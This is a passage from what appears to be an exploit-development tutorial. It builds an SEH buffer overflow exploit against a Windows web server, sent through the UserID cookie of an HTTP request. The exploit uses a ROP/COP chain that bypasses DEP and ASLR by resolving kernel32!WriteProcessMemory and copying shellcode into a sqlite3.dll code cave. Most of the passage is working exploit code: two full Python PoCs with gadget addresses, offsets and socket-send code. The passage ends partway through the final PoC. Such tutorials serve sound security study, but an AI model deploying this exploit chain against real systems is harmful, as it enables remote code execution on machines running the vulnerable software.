After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution- resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4- which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX- dynamically!
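The double dereference can be pictured with a toy memory map. Only the two addresses 0x2636920 and 0x61c832e4 come from the text; the final value is a made-up stand-in for an address inside kernel32.dll, and mov_eax_deref is a hypothetical helper.

```python
# Toy memory map. Only 0x2636920 and 0x61c832e4 come from the text;
# the final value is a made-up stand-in for an address inside kernel32.dll.
FAKE_KERNEL32_POINTER = 0x76543210
memory = {
    0x02636920: 0x61c832e4,             # stack slot -> IAT entry
    0x61c832e4: FAKE_KERNEL32_POINTER,  # IAT entry -> kernel32 function
}

def mov_eax_deref(eax):
    """Model `mov eax, dword [eax] ; ret`."""
    return memory[eax]

eax = 0x02636920
eax = mov_eax_deref(eax)
print(hex(eax))   # 0x61c832e4
eax = mov_eax_deref(eax)
print(hex(eax))   # 0x76543210
```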

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32!WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes- we use the negative distance).

However, if we subtract these two values- it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math- let’s just use a different function from the IAT. Preferably, let’s find a function whose virtual address is lower than that of kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d- and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP- which will compensate for ROP gadget which moves EBP into ESP via "leave")
crash += struct.pack('<L', 0x10018606)		# pop ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)		# Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX to 8 bytes before the lpBuffer placeholder, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated PoC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)		# pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)		# Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)		# add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the negative offset into EBX
  3. Move the offset into EDX (by adding EBX to the zeroed EDX)
  4. Subtract EDX from EAX, placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!
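
As a quick sanity check on the arithmetic, the subtraction can be modeled in a few lines of Python. This is only a sketch: the kernel32!GetStartupInfoA address below is a made-up value for illustration (the real one changes with ASLR), and neg32 and sub32 are hypothetical helper names. The only value taken from the PoC is 0xfffffd2d. Storing the distance in negated form is presumably done to keep null bytes out of the buffer, since the positive distance packs to bytes that contain \x00.

```python
import struct

MASK32 = 0xFFFFFFFF

def neg32(value):
    """Two's complement negation, truncated to 32 bits."""
    return (-value) & MASK32

def sub32(a, b):
    """Model of `sub eax, edx`: 32-bit subtraction with wraparound."""
    return (a - b) & MASK32

NEG_DISTANCE = 0xfffffd2d        # value popped into EBX in the PoC
distance = neg32(NEG_DISTANCE)   # positive distance between the two functions

# Hypothetical runtime address of kernel32!GetStartupInfoA (illustration only)
get_startup_info_a = 0x76e01000

# With EDX = 0xfffffd2d, `sub eax, edx` behaves like adding the positive distance
write_process_memory = sub32(get_startup_info_a, NEG_DISTANCE)

print(hex(distance))
print(hex(write_process_memory))
print(b"\x00" in struct.pack('<L', distance))      # positive form contains null bytes
print(b"\x00" in struct.pack('<L', NEG_DISTANCE))  # negated form does not
```

Subtracting the negated value and adding the positive one give the same 32-bit result, which is why the routine can use sub eax, edx with a constant that is safe to place in the buffer.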

Perfect! All that is left to do now is use our arbitrary write primitive to overwrite the kernel32!WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you recall, we already decremented ECX so that it contains the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write writes to ECX + 0x8 rather than to ECX itself. To compensate for this, we will decrement ECX by a further 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, it will land exactly on the placeholder.

crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write- and we can see we will be overwriting our parameter placeholder- as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!
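
The compensation can be illustrated with a toy model of the gadget. This is a sketch under stated assumptions: the stack address and the resolved function address are made-up values, memory is modeled as a plain dictionary, and arbitrary_write is a hypothetical helper that mimics mov dword [ecx+0x8], eax.

```python
def arbitrary_write(memory, ecx, eax):
    """Model of `mov dword [ecx+0x8], eax`."""
    memory[ecx + 0x8] = eax

# Hypothetical values, for illustration only
placeholder_addr = 0x0012f100   # stack slot holding the function placeholder
resolved_wpm = 0x76e012d3       # made-up resolved address held in EAX

# The slot initially holds the IAT pointer used as the placeholder in the PoC
memory = {placeholder_addr: 0x1004d1ec}

ecx = placeholder_addr
for _ in range(8):              # eight `dec ecx ; ret` gadgets
    ecx -= 1

arbitrary_write(memory, ecx, resolved_wpm)

print(hex(ecx))
print(hex(memory[placeholder_addr]))
```

Because ECX sits 0x8 bytes before the slot when the gadget runs, the write lands on the placeholder itself and on nothing else.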

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP- and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes below the stack address we want to load into ESP (this was due to the compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we need to increase ECX by 0x8 so that it contains the stack address in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)		# mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)		# xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode- directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated PoC- we can see that the call to kernel32!WriteProcessMemory is complete- and that we have hit our breakpoints!
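
To see why returning into that stack address kicks off the call, here is a small model of the frame at the moment of the pivot. It is a sketch, not the author's code: the function address and the lpBuffer address are hypothetical stand-ins (both are resolved dynamically by the ROP chain), the remaining values come from the PoC's parameter placeholders, and ret is a hypothetical helper that mimics the ret instruction.

```python
import struct

# Values from the PoC where fixed; the others are hypothetical stand-ins
frame = [
    ("function",               0x76e012d3),  # hypothetical resolved kernel32!WriteProcessMemory
    ("return address",         0x61c72530),  # code cave in sqlite3.dll
    ("hProcess",               0xFFFFFFFF),  # pseudo handle for the current process
    ("lpBaseAddress",          0x61c72530),  # same code cave: destination of the copy
    ("lpBuffer",               0x0012f400),  # hypothetical stack address of the shellcode
    ("nSize",                  0x180),
    ("lpNumberOfBytesWritten", 0x1004D740),  # writable location in ImageLoad.dll
]

stack = b"".join(struct.pack('<L', value) for _, value in frame)

def ret(stack_bytes, esp):
    """Model of `ret`: pop a dword into EIP and advance ESP by 4."""
    (eip,) = struct.unpack_from('<L', stack_bytes, esp)
    return eip, esp + 4

# After `xchg eax, esp`, ESP points at offset 0 of this frame and the gadget's `ret` runs
eip, esp = ret(stack, 0)

# When the called function returns, it pops the return-address slot
return_to, _ = ret(stack, esp)

print(hex(eip))
print(hex(return_to))
```

The return address and lpBaseAddress are the same code cave, so once the copy finishes, execution continues in the bytes that were just written there.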

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain ESP + 0x24 (this value will eventually be placed in EBP. EBP will then be placed into ESP, which compensates for the "leave" in the ROP gadget that moves EAX into ECX)
crash += struct.pack('<L', 0x10018606)		# pop ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
